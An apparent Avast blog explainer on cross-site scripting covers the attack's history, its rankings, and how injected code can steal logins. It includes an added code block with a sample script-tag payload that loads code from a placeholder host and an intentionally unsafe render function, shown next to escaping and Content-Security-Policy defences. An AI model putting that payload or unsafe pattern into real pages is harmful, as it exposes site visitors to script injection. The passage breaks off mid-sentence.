Understanding Cross-Site Scripting Attacks | Avast

David Strom, 4 November 2020

Getting to know these highly customizable cyberattacks and how to protect yourself from them



You wouldn’t think an attack method that was first found more than 20 years ago would be at the top of anyone’s list of popular current attacks. But that is the case for Cross-Site Scripting (XSS), a method that was first discovered by Microsoft engineers at the turn of the century.
Our XSS explainer webpage goes into more detail about the different attack types and some of the more notable attacks and victims down through the years. Top marks were issued by MITRE’s Common Weakness Enumeration group, which also listed 24 other dangerous software weaknesses. Other malware-watchers have also attested to XSS’s popularity over the years: it was #7 on the OWASP top ten list of website vulnerabilities back in 2017.
The basic idea is to take a targeted website and inject some code into its webpages so it loads content from other domains. This could take the form of a malicious login page, a set of session web cookies that can load malware, or a SQL injection or other kinds of compromises. A user is tricked into clicking on a malicious link to start things up. At that point, the user could divulge their passwords or permit an attacker to take remote control over their PC completely, depending on the design of the malware.
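The injection described above, shown next to its two standard defences (output encoding and a Content-Security-Policy), as an added example that is not from the original article. The search-page template, the function names, and the hosts `shop.example` and `evil.example` are assumptions made for illustration.

```javascript
// Added example: constructed input and hypothetical names, not from the article.

// Constructed sample: a "search term" that is really markup pulling a
// script from another domain (evil.example is a placeholder host).
const SAMPLE_INPUT = '<script src="https://evil.example/x.js"></script>';

// Vulnerable: user input is concatenated straight into the page markup.
function renderUnsafe(query) {
  return `<p>Results for: ${query}</p>`;
}

// HTML-encode the five characters that let text break out into markup.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened: same template, but the input is encoded so it renders as text.
function renderSafe(query) {
  return `<p>Results for: ${escapeHtml(query)}</p>`;
}

// Second layer: a Content-Security-Policy response header value that only
// allows scripts from the site's own origin, so an injected script tag
// pointing at another domain is refused by the browser.
function cspHeader() {
  return "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'";
}

// Review helper: list hosts of <script src> tags in rendered HTML that are
// not the site's own host. Relative URLs resolve to ownHost.
function foreignScriptHosts(html, ownHost) {
  const hosts = [];
  const re = /<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    let host;
    try { host = new URL(m[1], `https://${ownHost}/`).host; } catch { continue; }
    if (host !== ownHost) hosts.push(host);
  }
  return hosts;
}
```

Encoding at the point of output is the primary fix; the policy header is a backstop for templates where encoding was missed.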
One of the more infamous XSS attacks was called